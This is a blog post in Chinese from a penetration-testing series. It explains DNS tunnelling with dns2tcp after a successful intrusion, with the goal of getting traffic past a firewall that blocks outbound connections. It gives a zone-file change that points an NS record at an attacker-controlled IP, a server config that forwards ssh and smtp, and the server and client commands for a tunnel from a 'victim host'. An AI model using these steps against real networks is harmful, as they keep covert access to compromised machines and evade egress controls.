iT邦幫忙

2022 iThome 鐵人賽

DAY 29
0
Security

不想上班系列系列 第 29

[Day 29] 通訊掩護-DNS隧道

  • 分享至 

  • xImage
  •  

入侵成功後

  • 當然首要先開一個後門,方便逛逛的時候有沒有發現新的資料或目標

當出口被防火牆擋住時

  • 當我們想要將流量轉發到另一個端口時,有時候會發現被防火牆擋住了無法送出。這時候可以透過一些不會被攔截的端口傳輸流量

dns2tcp

  • 利用dns2tcp建立一個dns隧道,傳輸tcp數據

    • 因為port 53上執行的是DNS傳輸協議,所以封包不會被攔截
    • port udp 53/67/68
  • dns2tcp server端

    • 首先先改zone file

      {受害主機DNS} NS {target}
      
      {target} A {自己的ip}  # 將NS指向的域名連線到自己架設的惡意IP
      
    • config

      • /etc/dns2tcpd.conf
        • 預設
        • 改成
        •   listen = {自己的IP} or 0.0.0.0(監聽整個網段)
            port = 53 
            user = nobody 
            chroot = /tmp
            domain = {受害主機}
            resources = ssh:127.0.0.1:22,smtp:127.0.0.1:25 # 有sock再加上socks:127.0.0.1:1082
          
    • 啟動

      • dns2tcpd -F -f /etc/dns2tcpd.conf
    • 關閉

      • killall dns2tcpd
  • dns2tcp client端

    在server端的NS生效後啟動

    • dns2tcpc -c -l 2222 -d 1 -r ssh -z {受害主機}

          -c 壓縮數據
          -l 監聽的端口
          -z 後接設置的NS紀錄
      

上一篇
[Day 28] Password Spraying
下一篇
[Day 30] 入侵步驟簡介與後記
系列文
不想上班系列30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言